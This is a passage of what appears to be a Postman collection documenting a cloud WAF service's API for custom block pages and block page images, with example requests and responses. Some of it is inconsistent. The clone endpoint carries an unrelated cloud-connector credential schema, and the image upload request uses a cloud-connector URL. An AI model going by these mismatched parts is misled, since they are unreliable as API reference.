\"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"message\": \"Custom block page was created successfully.\"}"},{"id":"afcd0ddb-628c-4c70-bc18-dd847f4cc7a3","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"what$ss\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": \"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"Name 'what$ss' is invalid\"}"}],"_postman_id":"c20df39f-8591-488c-bb7f-0e777d99a4c9"},{"name":"Clone Custom Block Message","id":"0c3db8cd-7f55-41e9-91df-defa63551075","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"from_name\": \"from_page_name\",\r\n    \"to_name\": \"new_page_name\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages/clone","description":"<p>Test the Connector whether its connection can be established.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"type\": {\n            \"description\": \"The type of the Cloud Connector, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"aws\", \"azure\", \"gcp\"]\n        },\n        \"is_encrypted\": {\n            \"description\": \"Whether it('aws_secret_access_key', 'client_secret', 'private_key') is encrypted or plain text, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"true\", \"false\"]\n        },\n        \"region\": {\n            \"description\": \"The region of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"access_key_id\": {\n            \"description\": \"The Access Key ID of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"aws_secret_access_key\": {\n            \"description\": \"The Secret Access Key of the AWS Account, required on 'type': 'aws'.\",\n            \"type\": \"string\"\n        },\n        \"have_vpc_id\": {\n            \"description\": \"Whether to specify VPC ID, required on 'type': 'aws'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"vpc_id\": {\n            \"description\": \"The VPC ID of the AWS Account, required on 'type': 'aws' and 'have_vpc_id': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"server_region\": {\n            \"description\": \"The region of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"global\", \"china\", \"germany\", \"us_gov\"]\n        },\n        \"tenant_id\": {\n            \"description\": \"The Tenant ID of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_id\": {\n            \"description\": \"The Client ID of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"client_secret\": {\n            \"description\": \"The Client Secret of the Azure Account, required on 'type': 'azure'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_path\": {\n            \"description\": \"Whether to specify Subscription ID, required on 'type': 'azure'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"subscription_id\": {\n            \"description\": \"The Subscription ID of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"have_resource_group\": {\n            \"description\": \"Whether to specify Resource Group, required on 'type': 'azure' and 'have_resource_path': 'enable'.\",\n            \"type\": \"string\",\n            \"enum\": [\"disable\", \"enable\"]\n        },\n        \"resource_group\": {\n            \"description\": \"The Resource Group of the Azure Account, required on 'type': 'azure' and 'have_resource_path': 'enable' and 'have_resource_group': 'enable'.\",\n            \"type\": \"string\"\n        },\n        \"project_id\": {\n            \"description\": \"The Project ID of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"service_account_email\": {\n            \"description\": \"The Service Account E-Mail of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"private_key\": {\n            \"description\": \"The Private Key of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        },\n        \"zone\": {\n            \"description\": \"The Zone of the GCP Account, required on 'type': 'gcp'.\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages","clone"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"2cd8db43-e82d-4ff9-83db-2b0b68b94fdb","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"from_name\": \"from_page_name\",\r\n    \"to_name\": \"new_page_name\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages/clone"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"Duplicate name is not allowed.\"}"},{"id":"3e743781-0093-447e-9a93-18d42c3b8bec","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"from_name\": \"from_page_name\",\r\n    \"to_name\": \"new_page_name\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages/clone"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"message\": \"Operation is successful\"}"}],"_postman_id":"0c3db8cd-7f55-41e9-91df-defa63551075"},{"name":"Update Custom Block Message","id":"98c39e06-65db-4524-92e1-4bcca7d38372","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"new_page\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": \"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}"},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages","description":"<p>Modify html page content of a Custom Block Message. Name is not ediable.\nRequest body schema is same to the one of Creating Custom Block Page.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"383d42ec-b349-421f-a9f1-6ccb5b327cd7","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"new_page\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": \"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Predefined page is not allowed being updated.\"\n}"},{"id":"77d91880-66ad-4f8b-b4a9-e5ff741b42ce","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"new_page\",\n    \"description\": \"for test\",\n    \"type\": \"Custom\",\n    \"content\": [\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Attack Block Page\",\n            \"description\": \"Replacement HTML for Attack Block Page\",\n            \"id\": \"url-block\",\n            \"group\": \"Security\",\n            \"http_response_code\": 500\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Server Unavailable Page\",\n            \"description\": \"Replacement HTML for Server Unavailable Page\",\n            \"id\": \"server-inaccessible\",\n            \"group\": \"Security\",\n            \"http_response_code\": 503\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Enforcement Page\",\n            \"description\": \"Replacement HTML for Captcha Enforcement Page\",\n            \"id\": \"captcha-page\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        },\n        {\n            \"msg\": \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HT><body>...</body></html>\",\n            \"name\": \"Captcha Block Page\",\n            \"description\": \"Replacement HTML for Captcha Block Page\",\n            \"id\": \"captcha-block\",\n            \"group\": \"Captcha\",\n            \"http_response_code\": 200\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"message\": \"Custom block page was updated successfully.\"}"}],"_postman_id":"98c39e06-65db-4524-92e1-4bcca7d38372"},{"name":"Delete Custom Block Message","id":"c63c2bfb-69ae-4779-9478-91b4716a35fa","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/custom-block-page/messages?name={{page_name}}","description":"<p>Delete a Custom Block Page Message.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","messages"],"host":["api","tim","waasonline","com"],"query":[{"key":"name","value":"{{page_name}}"}],"variable":[]}},"response":[{"id":"1770fb38-7acc-43fc-b5a6-a707ed997c6c","name":"Success","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/messages?name={{page_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","messages"],"query":[{"key":"name","value":"{{page_name}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"46"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"08c9346d-869a-11e9-bcbc-a75865823244"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avl7eEtqIAMFyiw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf61d16-d93528509ed795107cb428c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"message\": \"Custom block page was deleted successfully\"}"},{"id":"da7b3bb9-c548-4019-8b75-e2b819e2120c","name":"Fail","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/messages?name={{page_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","messages"],"query":[{"key":"name","value":"{{page_name}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1fb9b362-869a-11e9-99a0-cb59002286b1"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avmBeFX8oAMF5Qg="}],"cookie":[],"responseTime":null,"body":"{\"detail\": \"Custom block page '{{page_name}}' is used by apps.\"}"}],"_postman_id":"c63c2bfb-69ae-4779-9478-91b4716a35fa"},{"name":"Get Custom Block Page Images list","id":"6cc23f44-13af-49e5-8dfb-300e252f069f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/images","description":"<p>Get the list of Custom Block Page images, including predefined image.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","images"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"7acf5d32-53a1-4d2f-b4f6-c8bdc6c4306b","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:21:18 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"417"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b8ae2dfa-86a1-11e9-9dc2-c195e9856560"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avt_VHGLoAMFrzg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf629fb-a24c19a6c1f619222a3e76b4;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"data\": [\n        {\n            \"name\": \"logo_v2_fnet\",\n            \"description\": \"\",\n            \"type\": \"Predefined\",\n            \"image_type\": \"png\",\n            \"created_at\": \"11/29/2020 16:17\",\n            \"content\": \"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPMAAAFnCAMAAABEqI...\"\n        },\n        {\n            \"name\": \"fsun\",\n            \"description\": \"\",\n            \"type\": \"Custom\",\n            \"image_type\": \"png\",\n            \"created_at\": \"12/23/2020 10:16\",\n            \"content\": \"data:image/png;base64,iVBORw0KGgoAAAANSUh...\"\n        }\n    ],\n    \"total\": 2,\n    \"user_perm\": \"rw\"\n}"},{"id":"b770c14b-699d-4f04-b7cc-ced2a4966c8f","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:34:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"9cc9e8b8-86a3-11e9-9c56-5df7ca7fdfd7"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avv-PF-5IAMF40A="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"6cc23f44-13af-49e5-8dfb-300e252f069f"},{"name":"Upload new Custom Block Page Image","id":"77f2361b-cf9f-41a6-b0da-ff5934dc8884","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n    \"name\": \"{{image_name}}\",\r\n    \"image_type\": \"png\",\r\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\r\n    \"created_at\": \"2020-12-31 15:54:57\",\r\n    \"description\": \"for demo\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/global-cloud-connectors","description":"<p>Upload a new Custom Block Page Image.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"name\": {\n            \"description\": \"The unique name of the image, with number, letter or underscore, required. maximum length is 30\",\n            \"type\": \"string\"\n        },\n        \"image_type\": {\n            \"description\": \"The type of image, required.\",\n            \"type\": \"string\",\n            \"enum\": [\"png\", \"gif\"]\n        },\n        \"description\": {\n            \"description\": \"optional.\",\n            \"type\": \"string\"\n        },\n        \"content\": {\n            \"description\": \"Image content string encoded with base64.\",\n            \"type\": \"string\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","global-cloud-connectors"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"04ae6729-5c94-47e5-95e5-e9f75e59b09a","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"{{image_name}}\",\n    \"image_type\": \"png\",\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\n    \"created_at\": \"2020-12-31 15:54:57\",\n    \"description\": \"for demo\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"message\": \"Image '{{image_name}}' was uploaded successfully.\"}"},{"id":"511454cf-53a8-4f5b-848b-d1349a4eec12","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"{{image_name}}\",\n    \"image_type\": \"png\",\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\n    \"created_at\": \"2020-12-31 15:54:57\",\n    \"description\": \"for demo\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"code":401,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"77f2361b-cf9f-41a6-b0da-ff5934dc8884"},{"name":"Update Custom Block Page Image","id":"851731c4-6591-41c3-b079-dd373c8388f2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"{{image_name}}\",\n    \"image_type\": \"png\",\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\n    \"created_at\": \"2020-12-31 15:54:57\",\n    \"description\": \"for demo\"\n}"},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images","description":"<p>Modify the type or content of an Custom Block Page Image.\nRequest body schema is same to the one of create.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","images"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"68819bce-7ffe-4c89-89ef-e4090dc092fb","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"{{image_name}}\",\n    \"image_type\": \"png\",\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\n    \"created_at\": \"2020-12-31 15:54:57\",\n    \"description\": \"for demo\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:20:12 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"f440c12f-86a9-11e9-a4ee-bd0372d17d3e"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av2n0HfsoAMFxOA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf637cb-13a2a7b01c3710724fc56bca;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"message\": \"Image '{{image_name}}' was uploaded successfully.\"}"},{"id":"d80b2488-5240-4864-9329-b17c47c96f9f","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"{{image_name}}\",\n    \"image_type\": \"png\",\n    \"content\": \"data:image/png;base64,VBORw0KGgoAAAANSUhEUgAAAEgAAA...\",\n    \"created_at\": \"2020-12-31 15:54:57\",\n    \"description\": \"for demo\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\"detail\": \"Image size has exceeded limitation of 24KB\"}"}],"_postman_id":"851731c4-6591-41c3-b079-dd373c8388f2"},{"name":"Delete Custom Block Page Image","id":"e4c2cac7-f6c0-4bc4-9938-048f88d8c166","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/custom-block-page/images?name={{image_name}}","description":"<p>Delete a  Custom Block Page Image.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","custom-block-page","images"],"host":["api","tim","waasonline","com"],"query":[{"key":"name","value":"{{image_name}}"}],"variable":[]}},"response":[{"id":"3f432ef3-efe7-43d2-828a-df4897ea75cc","name":"Success","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/images?name={{image_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","images"],"query":[{"key":"name","value":"{{image_name}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:26:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"46"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"08c9346d-869a-11e9-bcbc-a75865823244"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avl7eEtqIAMFyiw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf61d16-d93528509ed795107cb428c0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\"message\": \"Operation is successful\"}"},{"id":"782e2d83-dae6-4526-9cff-c71903bb2c17","name":"Fail","originalRequest":{"method":"DELETE","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/custom-block-page/images?name={{image_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","custom-block-page","images"],"query":[{"key":"name","value":"{{image_name}}"}]}},"status":"Bad 